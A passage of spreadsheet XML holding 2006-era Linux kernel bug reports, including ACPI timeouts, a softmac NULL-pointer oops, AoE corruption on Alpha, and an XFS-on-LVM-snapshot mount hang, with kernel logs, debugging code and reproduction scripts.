read_zero+0x14f/0x230 Dec 7 04:17:21 xxxxx kernel: [128531.709561] [&lt;ffffffff802801f9&gt;] vfs_read+0xe9/0x1b0 Dec 7 04:17:21 xxxxx kernel: [128531.709587] [&lt;ffffffff802805e3&gt;] sys_read+0x53/0x90 Dec 7 04:17:21 xxxxx kernel: [128531.709615] [&lt;ffffffff80209b5e&gt;] system_call+0x7e/0x83 Dec 7 04:17:21 xxxxx kernel: [128531.709641] Dec 7 04:17:21 xxxxx kernel: [128531.709658] Dec 7 04:17:21 xxxxx kernel: [128531.709659] Code: 0f 0b 68 f0 9f 4e 80 c2 64 04 49 89 1c 24 49 81 c5 00 10 00 Dec 7 04:17:21 xxxxx kernel: [128531.709737] RIP [&lt;ffffffff8026722b&gt;] zeromap_page_range+0x2ab/0x330 Dec 7 04:17:21 xxxxx kernel: [128531.709765] RSP &lt;ffff81011639be38&gt; My desktop machine is an Intel(R) Pentium(R) 4 CPU 3.20GHz with HT. The same application runs fine on Solaris10 ( also on my desktop ) and on older versions of Linux kernel.</t>
  </si>
  <si>
    <t>ACPI events stop working</t>
  </si>
  <si>
    <t>2.6.18.1 2.6.19.0</t>
  </si>
  <si>
    <t>2006-12-07 03:31 UTC</t>
  </si>
  <si>
    <t>2007-05-17 13:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Asus M6Ne Software Environment: Gentoo Linux Problem Description: Sometimes, the ACPI subsystem seems to stop working. In this case, I get the following errors in dmesg, and all button events stop working (they do not arrive at the acpid) : ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Exception (dswexec-0458): AE_TIME, While resolving operands for [OpcodeName unavailable] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.STC5] (Node c147dea0), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0.BST2] (Node c147a2e8), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BATS] (Node c147df18), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BATS] (Node c147df18), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Exception (dswexec-0458): AE_TIME, While resolving operands for [OpcodeName unavailable] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.RWRD] (Node c147dc84), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0.BST3] (Node c147a2d4), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BATS] (Node c147df18), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BATS] (Node c147df18), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] ACPI Exception (evregion-0424): AE_TIME, Returned by Handler for [EmbeddedControl] [20060707] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BATS] (Node c147df18), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.BAT0._BST] (Node c147a3d8), AE_TIME ACPI Exception (acpi_battery-0208): AE_TIME, Evaluating _BST [20060707] The amount of errors grows over time, but all other acpi features (button and AC events) stop working Steps to reproduce: Seems to be related to the CPU load. This error occurrs randomly, and I do not know what exactly causes it.</t>
  </si>
  <si>
    <t>2010-02-03 21:07 UTC</t>
  </si>
  <si>
    <t>BUG: NULL pointer dereference in ieee80211softmac_get_network_by_bssid_locked</t>
  </si>
  <si>
    <t>2.6.19-git13</t>
  </si>
  <si>
    <t>2006-12-09 12:11 UTC</t>
  </si>
  <si>
    <t>Michael Bommarito</t>
  </si>
  <si>
    <t>2006-12-15 05:58 UTC</t>
  </si>
  <si>
    <t>networking_wireless@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.x Distribution: Ubuntu Dapper Hardware Environment: Model: Compaq r4000 CPU: AMD Athlon64 3200+ Wireless Controller: BCM4306 lspci: 0000:00:00.0 Host bridge: ATI Technologies Inc RS480 Host Bridge 0000:00:01.0 PCI bridge: ATI Technologies Inc: Unknown device 5a3f 0000:00:04.0 PCI bridge: ATI Technologies Inc: Unknown device 5a36 0000:00:13.0 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller 0000:00:13.1 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller 0000:00:13.2 USB Controller: ATI Technologies Inc IXP SB400 USB2 Host Controller0000:00:14.0 SMBus: ATI Technologies Inc IXP SB400 SMBus Controller (rev 10) 0000:00:14.1 IDE interface: ATI Technologies Inc Standard Dual Channel PCI IDE Controller ATI 0000:00:14.3 ISA bridge: ATI Technologies Inc IXP SB400 PCI-ISA Bridge 0000:00:14.4 PCI bridge: ATI Technologies Inc IXP SB400 PCI-PCI Bridge 0000:00:14.5 Multimedia audio controller: ATI Technologies Inc IXP SB400 AC'97 Audio Controller (rev 01) 0000:00:14.6 Modem: ATI Technologies Inc ATI SB400 - AC'97 Modem Controller (rev 01) 0000:00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 0000:00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 0000:00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 0000:00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 0000:01:05.0 VGA compatible controller: ATI Technologies Inc ATI Radeon XPRESS 200M 5955 (PCIE) 0000:03:00.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 0000:03:02.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) 0000:03:04.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller 0000:03:04.3 Mass storage controller: Texas Instruments PCIxx21 Integrated FlashMedia Controller 0000:03:04.4 0805: Texas Instruments PCI6411, PCI6421, PCI6611, PCI6621, PCI7411, PCI7421, PCI7611, PCI7621 Secure Digital (SD) Controller 0000:03:06.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Software Environment: ver_linux: Gnu C 4.0.3 Gnu make 3.81beta4 binutils 2.16.91 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.38 jfsutils 1.1.8 reiserfsprogs 3.6.19 reiser4progs 1.0.5 xfsprogs 2.7.7 pcmciautils 012 pcmcia-cs 3.2.8 PPP 2.4.4b1 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.93 udev 079 wireless-tools 28 Problem Description: Dec 9 14:22:05 metagnosis kernel: [ 109.616000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] printing eip: Dec 9 14:22:05 metagnosis kernel: [ 109.616000] c0310113 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] *pde = 00000000 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Oops: 0000 [#1] Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Modules linked in: xfs nls_utf8 ntfs sr_mod scsi_mod usbhid snd_atiixp snd_atiixp_modem snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore pcspkr psmouse serio_raw snd_page_alloc ehci_hcd ohci_hcd usbcore Dec 9 14:22:05 metagnosis kernel: [ 109.616000] CPU: 0 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] EIP: 0060:[ieee80211softmac_get_network_by_bssid_locked+35/96] Not tainted VLI Dec 9 14:22:05 metagnosis kernel: [ 109.616000] EFLAGS: 00010086 (2.6.19-git13 #2) Dec 9 14:22:05 metagnosis kernel: [ 109.616000] EIP is at ieee80211softmac_get_network_by_bssid_locked+0x23/0x60 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] eax: edce8980 ebx: 00000206 ecx: 00000000 edx: 00000000 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] esi: 00000008 edi: edce8a20 ebp: edce8ca4 esp: c16a7e84 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] ds: 007b es: 007b ss: 0068 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Process events/0 (pid: 4, ti=c16a6000 task=edecba90 task.ti=c16a6000) Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Stack: c16a7e94 edce8a0c 00000206 00000008 edce8a20 edce8980 c0310159 edce8980 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] c031179e edce8980 000000c0 edce8a20 c0311b7f 00000001 00000003 edee4450 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] 00000000 00000086 00000086 c16a7ee8 edce89bc 00000000 00000000 e2bff0d0 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Call Trace: Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_get_network_by_bssid+9/16] ieee80211softmac_get_network_by_bssid+0x9/0x10 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_send_disassoc_req+62/112] ieee80211softmac_send_disassoc_req+0x3e/0x70 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_assoc_work+271/1152] ieee80211softmac_assoc_work+0x10f/0x480 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_assoc_notify_scan+0/16] ieee80211softmac_assoc_notify_scan+0x0/0x10 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_notify_callback+76/96] ieee80211softmac_notify_callback+0x4c/0x60 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_notify_callback+0/96] ieee80211softmac_notify_callback+0x0/0x60 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_assoc_notify_scan+0/16] ieee80211softmac_assoc_notify_scan+0x0/0x10 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [ieee80211softmac_notify_callback+0/96] ieee80211softmac_notify_callback+0x0/0x60 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [run_workqueue+99/288] run_workqueue+0x63/0x120 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [worker_thread+254/352] worker_thread+0xfe/0x160 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [default_wake_function+0/16] default_wake_function+0x0/0x10 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [worker_thread+0/352] worker_thread+0x0/0x160 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [kthread+215/224] kthread+0xd7/0xe0 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [kthread+0/224] kthread+0x0/0xe0 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] [kernel_thread_helper+7/24] kernel_thread_helper+0x7/0x18 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] ======================= Dec 9 14:22:05 metagnosis kernel: [ 109.616000] Code: ff 53 9d 5b c3 8d 76 00 55 8d a8 24 03 00 00 57 56 53 83 ec 08 89 54 24 04 8b 90 24 03 00 00 eb 0a 8d b4 26 00 00 00 00 8b 14 24 &lt;8b&gt; 02 89 04 24 0f 18 00 90 39 ea 74 1f 8b 7c 24 04 8d 72 08 b8 Dec 9 14:22:05 metagnosis kernel: [ 109.616000] EIP: [ieee80211softmac_get_network_by_bssid_locked+35/96] ieee80211softmac_get_network_by_bssid_locked+0x23/0x60 SS:ESP 0068:c16a7e84 Steps to reproduce: $ iwconfig eth1 essid ... This has occured since at least -git7 and I've tested up to -git13 (didn't see any relevant changes in -git14, although if someone thinks otherwise I can try again). After the OOPS, the keyboard goes dead although other non-network operation is fine. Obviously the machine is also unable to shutdown when init hangs trying to shut network interfaces off. Here are the configurations I've tried: * bcm43xx data transfer: ** DMA ** DMA + PIO * MSI ** on ** off * Preemption ** voluntary ** full * ieee80211 and bcm43xx ** as module ** as static Have been busy as of late and not watching mailing list, so other than the dmesg and giving the list of flags I've flipped, I can't offer much other direction.</t>
  </si>
  <si>
    <t>AOE filesystem corruption on Alpha</t>
  </si>
  <si>
    <t>2.6.19 and master branch</t>
  </si>
  <si>
    <t>2006-12-09 23:11 UTC</t>
  </si>
  <si>
    <t>2008-04-13 17:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19-rc2 2.6.19-rc3 through 2.6.19-rc6 OOPSed everytime the aoe module was loaded and 2.6.19 and the master branch don't OOPS but silently fail with some operations. Distribution: Hardware Environment: Alpha Alcor 433XLT, ev5 cpu Software Environment: gcc 3.3.6 Problem Description: Creating a file system using mkfs.ext3 or mkreiserfs silently fails. Easy to get filesystem corruption. The aoe module loads and shows aoe: AoE v32 initialised. aoe: e9.0: setting 1024 byte data frames on eth0 aoe: 0000e8d80d95 e9.0 v400c has 2097152 sectors etherd/e9.0: unknown partition table Both mkfs.ext3 /dev/etherd/e9.0 and mkreiserfs /dev/etherd/e9.0 claim to be successfull in creating a filesystem on aoe. Trying to mount the new filesystem afterwards gives mount: wrong fs type, bad option, bad superblock on /dev/etherd/e9.0, missing codepage or other error In some cases useful info is found in syslog - try dmesg | tail or so The respective dmesg messages are VFS: Can't find ext3 filesystem on dev etherd/e9.0. and ReiserFS: etherd/e9.0: warning: sh-2021: reiserfs_fill_super: can not find reiserfs on etherd/e9.0 Filesystems on aoe that were good are getting corrupted when used with 2.6.19 on the Alpha Steps to reproduce: modprobe aoe mkfs.ext3 /dev/etherd/e9.0 mount -t ext3 /dev/etherd/e9.0 /mnt or To kill a good filesystem on aoe it can be as simple as untarring something to generate a lot of filesystem activty. Finishing with an error like EXT3-fs error (device etherd/e9.0): ext3_readdir: bad entry in directory #2: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0 No apparent problems with ext3 on the local disk and aoe is working with the same kernel version on an Athlon xp2000.</t>
  </si>
  <si>
    <t>XFS mount of LVM2 snapshot hangs occasionally</t>
  </si>
  <si>
    <t>2006-12-11 16:18 UTC</t>
  </si>
  <si>
    <t>Kuba Pamirski</t>
  </si>
  <si>
    <t>2008-04-13 22:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Distribution: Fedora Hardware Environment: PC, P4 2.4GHz HT, Abit Mainboard, HD: WD2000-JS 200GB Software Environment: LVM2, Logical Volume and LVM snapshots Problem Description: Mount operation applied to LVM2 snapshot hangs occasionally whenever main Logical Volume is in use. Possibly due to heavy IO load, congestion. I was able to track this error with help of simple debugging methodology. First, I discovered that hanging occurs within xlog_recover() function of xfs_log_recover.c source file. xlog_recover() calls xlog_do_recover() where I placed a few printk's to give me a clue about closer location of the problem: xlog_do_recover( xlog_t *log, xfs_daddr_t head_blk, xfs_daddr_t tail_blk) { int error; xfs_buf_t *bp; xfs_sb_t *sbp; printk("xlog_do_recover: #1\n"); /* * First replay the images in the log. */ error = xlog_do_log_recovery(log, head_blk, tail_blk); if (error) { return error; } printk("xlog_do_recover: #2\n"); XFS_bflush(log-&gt;l_mp-&gt;m_ddev_targp); printk("xlog_do_recover: #3\n"); /* * If IO errors happened during recovery, bail out. */ if (XFS_FORCED_SHUTDOWN(log-&gt;l_mp)) { return (EIO); } printk("xlog_do_recover: #4\n"); /* * We now update the tail_lsn since much of the recovery has completed * and there may be space available to use. If there were no extent * or iunlinks, we can free up the entire log and set the tail_lsn to * be the last_sync_lsn. This was set in xlog_find_tail to be the * lsn of the last known good LR on disk. If there are extent frees * or iunlinks they will have some entries in the AIL; so we look at * the AIL to determine how to set the tail_lsn. */ printk("xlog_do_recover: #5\n"); xlog_assign_tail_lsn(log-&gt;l_mp); /* * Now that we've finished replaying all buffer and inode * updates, re-read in the superblock. */ printk("xlog_do_recover: #6\n"); bp = xfs_getsb(log-&gt;l_mp, 0); XFS_BUF_UNDONE(bp); XFS_BUF_READ(bp); xfsbdstrat(log-&gt;l_mp, bp); printk("xlog_do_recover: #7\n"); if ((error = xfs_iowait(bp))) { printk("xlog_do_recover: #100\n"); xfs_ioerror_alert("xlog_do_recover", log-&gt;l_mp, bp, XFS_BUF_ADDR(bp)); ASSERT(0); xfs_buf_relse(bp); printk("xlog_do_recover: #101\n"); return error; } /* Convert superblock from on-disk format */ sbp = &amp;log-&gt;l_mp-&gt;m_sb; printk("xlog_do_recover: #8\n"); xfs_xlatesb(XFS_BUF_TO_SBP(bp), sbp, 1, XFS_SB_ALL_BITS); ASSERT(sbp-&gt;sb_magicnum == XFS_SB_MAGIC); ASSERT(XFS_SB_GOOD_VERSION(sbp)); xfs_buf_relse(bp); printk("xlog_do_recover: #9\n"); xlog_recover_check_summary(log); /* Normal transactions can now occur */ log-&gt;l_flags &amp;= ~XLOG_ACTIVE_RECOVERY; return 0; } Whenever mount operation hangs, it hangs after displaying "xlog_do_recover: #7" message. It hangs on xfs_iowait(bp) function call. WCHAN of changing mount process suggested semaphore infinite wait. In xfs_buf.h we read: #define xfs_iowait(bp) xfs_buf_iowait(bp) and xfs_buf_iowait() is defined in xfs_buf.c, again. Within this function, mount operation hangs on: down(&amp;bp-&gt;b_iodonesema); In order to be able to log some useful information I changed xfs_buf_iowait() definition in such a way that: a. it tries to get the semaphore using down_trylock() b. unless successfull, it logs some fields of our xfs_buf_t structure. c. finally it hangs using original down(&amp;bp-&gt;b_iodonesema) My function looks as follows: int xfs_buf_iowait( xfs_buf_t *bp) { XB_TRACE(bp, "iowait", 0); if (atomic_read(&amp;bp-&gt;b_io_remaining)) blk_run_address_space(bp-&gt;b_target-&gt;bt_mapping); if (down_trylock(&amp;bp-&gt;b_iodonesema)) { printk("xfs_buf_iowait blocked, b_io_rem: %d, b_error: %d, b_flags: %d, block: %lld, dev_maj: %d, dev_min: %d, XBF_ASYNC: %d\n", atomic_read(&amp;bp-&gt;b_io_remaining), bp-&gt;b_error, bp-&gt;b_flags, bp-&gt;b_bn, MAJOR(bp- &gt;b_target-&gt;bt_dev), MINOR(bp-&gt;b_target-&gt;bt_dev), (((bp-&gt;b_flags &amp; XBF_ASYNC) != 0) ? 1 : 0)); down(&amp;bp-&gt;b_iodonesema); } XB_TRACE(bp, "iowaited", (long)bp-&gt;b_error); return bp-&gt;b_error; } To be able to log even more diagnostic information I added additional printk's within dm_request() and dec_pending() functions of dm.c file. This logging takes place on start and end of any io operation entering device mapper. To limit excessive logging I only log BIOs referring to bi_sector == 0 which is sufficient in this case. Now, with proper, non-hanging execution of mount operation we get something that looks like: Dec 12 01:13:08 localhost kernel: [17179773.208000] XFS mounting filesystem dm-5 Dec 12 01:13:08 localhost kernel: [17179773.344000] xfs_buf_iowait blocked, b_io_rem: 1, b_error: 0, b_flags: 262149, block: 40960032, dev_maj: 253, dev_min: 5, XBF_ASYNC: 0 ... Dec 12 01:13:15 localhost kernel: [17179786.228000] xlog_do_recover: #2 ... Dec 12 01:13:21 localhost kernel: [17179786.300000] xlog_do_recover: #3 Dec 12 01:13:21 localhost kernel: [17179786.300000] xlog_do_recover: #4 Dec 12 01:13:24 localhost kernel: [17179786.300000] xlog_do_recover: #5 Dec 12 01:13:33 localhost kernel: [17179786.300000] xlog_do_recover: #6 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Dec 12 01:13:33 localhost kernel: [17179786.300000] dm_request: request for sector 0, device: 253:5, dir: READ Dec 12 01:13:33 localhost kernel: [17179786.300000] xlog_do_recover: #7 Dec 12 01:13:34 localhost kernel: [17179786.300000] xfs_buf_iowait blocked, b_io_rem: 1, b_error: 0, b_flags: 131333, block: 0, dev_maj: 253, dev_min: 5, XBF_ASYNC: 0 Dec 12 01:13:35 localhost kernel: [17179786.416000] dec_pending: ending bio for sector 0, device: 253:5, dir: READ &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Dec 12 01:13:35 localhost kernel: [17179786.416000] xlog_do_recover: #8 Dec 12 01:13:35 localhost kernel: [17179786.416000] xlog_do_recover: #9 ... Our focus point is on xlog_do_recover: #7 line with preceding IO request, xfs_iowait() call that follows and on final endio of IO request. Preceding IO request is always a READ request for block number 0. On the following line: Dec 12 01:13:34 localhost kernel: [17179786.300000] xfs_buf_iowait blocked, b_io_rem: 1, b_error: 0, b_flags: 131333, block: 0, dev_maj: 253, dev_min: 5, XBF_ASYNC: 0 you can read that xfs_buf_iowait call was about to block on b_iodonesema but it finally got woken up. b_flags of xfs_buf_t involved had NO XBF_ASYNC flag set. Now, with hanging path of mount execution you get something like this: &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Dec 12 01:20:33 localhost kernel: [17180171.176000] dm_request: request for sector 0, device: 253:9, dir: READ Dec 12 01:20:33 localhost kernel: [17180171.176000] xlog_do_recover: #7 Dec 12 01:20:34 localhost kernel: [17180171.176000] xfs_buf_iowait blocked, b_io_rem: 1, b_error: 0, b_flags: 131349, block: 0, dev_maj: 253, dev_min: 9, XBF_ASYNC: 1 Dec 12 01:20:34 localhost kernel: [17180171.176000] dec_pending: ending bio for sector 0, device: 253:9, dir: READ &gt;&gt;&gt;&gt;&gt;&gt;&gt; Everything looks similarly except for the fact that preceding READ operation on block number 0 initiated asynchronous mode of operation. This pattern is 100% repeatable - whenever XBF_ASYNC flag is 1 for this READ operation on block number 0, outstanding xfs_iowait() is never going to exit waiting state ! Steps to reproduce: 1. Create Logical Volume, mount it under /lv 2. Enter the following loop: while [ true ]; do lvcreate -L15GB -s -c256k -n1 /dev/VolGroup00/LogVol00; lvcreate -L15GB -s -n2 /dev/VolGroup00/LogVol00; lvcreate -L15GB -s -c256k -n3 /dev/VolGroup00/LogVol00; lvcreate -L15GB -s -n4 /dev/VolGroup00/LogVol00; for i in 1; do mount -onouuid /dev/VolGroup00/1 /s/1; mount -onouuid /dev/VolGroup00/2 /s/2; mount -onouuid /dev/VolGroup00/3 /s/3; mount -onouuid /dev/VolGroup00/4 /s/4; umount /s/1; umount /s/2; umount /s/3; umount /s/4; done echo "Removing /dev/VolGroup00/1"; time echo "y" | lvremove /dev/VolGroup00/1; echo "Removing /dev/VolGroup00/2"; time echo "y" | lvremove /dev/VolGroup00/2; echo "Removing /dev/VolGroup00/3"; time echo "y" | lvremove /dev/VolGroup00/3; echo "Removing /dev/VolGroup00/4"; time echo "y" | lvremove /dev/VolGroup00/4; echo "Removed all snapshots"; done 3. In background run additional script to cause IO load of the system: while [ true ]; do cat /dev/zero | head -c1000m &gt; /lv/output; rm -f /lv/output; done 4. After some system, script 2. will hang on some mount operation.</t>
  </si>
  <si>
    <t>Typo in Kconfig for Thermal family implementation</t>
  </si>
  <si>
    <t>W1</t>
  </si>
  <si>
    <t>2.6.19 from kernel.org</t>
  </si>
  <si>
    <t>2006-12-12 06:57 UTC</t>
  </si>
  <si>
    <t>Alexander Rigbo</t>
  </si>
  <si>
    <t>2006-12-12 07:11 UTC</t>
  </si>
  <si>
    <t>Evgeniy Polyakov</t>
  </si>
  <si>
    <t>Problem Description: Help text typo in linux-2.6.19/drivers/w1/slaves/Kconfig. It says you instead of your.</t>
  </si>
  <si>
    <t>MMC/SD</t>
  </si>
  <si>
    <t>doesn't work if present at boot</t>
  </si>
  <si>
    <t>em28xx</t>
  </si>
  <si>
    <t>2.6.19.1</t>
  </si>
  <si>
    <t>2006-12-16 01:09 UTC</t>
  </si>
  <si>
    <t>2007-06-22 13:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Hardware Environment: Software Environment: hg v4l-dvb-kernel Problem Description: Pinnacle Hybrid Pro doesn't work if connected before boot. log if connected before boot: Linux video capture interface: v2.00 em28xx v4l2 driver version 0.0.1 loaded em28xx new video device (eb1a:2881): interface 0, class 255 em28xx #0: Alternate settings: 8 em28xx #0: Alternate setting 0, max size= 0 em28xx #0: Alternate setting 1, max size= 0 em28xx #0: Alternate setting 2, max size= 1448 em28xx #0: Alternate setting 3, max size= 2048 em28xx #0: Alternate setting 4, max size= 2304 em28xx #0: Alternate setting 5, max size= 2580 em28xx #0: Alternate setting 6, max size= 2892 em28xx #0: Alternate setting 7, max size= 3072 Tuner: registering extension (Xceive 3028 Tuner) input: em2880/em2870 remote control as /class/input/input3 em28xx-input.c: remote control handler attached PM: Adding info for No Bus:i2c-0 PM: Adding info for i2c:0-0050 attach_inform: eeprom detected. em28xx #0: i2c eeprom 00: 1a eb 67 95 1a eb 81 28 58 12 5c 00 6a 20 6a 00 em28xx #0: i2c eeprom 10: 00 00 04 57 64 57 00 00 60 f4 00 00 02 02 00 00 em28xx #0: i2c eeprom 20: 56 00 01 00 00 00 02 00 b8 00 00 00 5b 1e 00 00 em28xx #0: i2c eeprom 30: 00 00 20 40 20 80 02 20 10 02 00 00 00 00 00 00 em28xx #0: i2c eeprom 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom 60: 00 00 00 00 00 00 00 00 00 00 20 03 55 00 53 00 em28xx #0: i2c eeprom 70: 42 00 20 00 32 00 38 00 38 00 31 00 20 00 56 00 em28xx #0: i2c eeprom 80: 69 00 64 00 65 00 6f 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 em28xx #0: i2c eeprom e0: 5a 00 55 aa 79 55 54 03 00 17 98 01 00 00 00 00 em28xx #0: i2c eeprom f0: 0c 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 EEPROM ID= 0x9567eb1a Vendor/Product ID= eb1a:2881 AC97 audio (5 sample rates) USB Remote wakeup capable 500mA max power Table at 0x04, strings=0x206a, 0x006a, 0x0000 tuner 0-0061: chip found @ 0xc2 (em28xx #0) PM: Adding info for i2c:0-0061 attach inform (default): detected I2C address c2 Tuner: setting up tuner core extension for: Xceive 3028 Tuner Loading base firmware: xc3028_init0.i2c.fw Loading default analogue TV settings: xc3028_BG_PAL_A2_A.i2c.fw PM: Adding info for i2c:0-005c attach_inform: tvp5150 detected. tvp5150 0-005c: tvp5150am1 detected. FIXME: Write failed, backtrace: =============================== 00 8c ================================ FIXME: Write failed, backtrace: =============================== 80 02 00 00 ================================ FIXME: Write failed, backtrace: =============================== 00 00 8d d0 ================================ em28xx-video.c: requesting em2880-dvb! em28xx #0: V4L2 VBI device registered as /dev/vbi0 em28xx #0: V4L2 device registered as /dev/video0 em28xx #0: Found Pinnacle Hybrid Pro em28xx audio device (eb1a:2881): interface 1, class 1 em28xx audio device (eb1a:2881): interface 2, class 1 usbcore: registered new interface driver em28xx PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 PM: Removing info for No Bus:usbdev1.3_ep83 PM: Adding info for No Bus:usbdev1.3_ep83 usbcore: registered new interface driver snd-usb-audio log if connected after boot: Dec 15 21:08:24 localhost usb 1-3: new high speed USB device using ehci_hcd and address 6 Dec 15 21:08:25 localhost PM: Adding info for usb:1-3 Dec 15 21:08:25 localhost PM: Adding info for No Bus:usbdev1.6_ep00 Dec 15 21:08:25 localhost usb 1-3: configuration #1 chosen from 1 choice Dec 15 21:08:25 localhost PM: Adding info for usb:1-3:1.0 Dec 15 21:08:25 localhost PM: Adding info for No 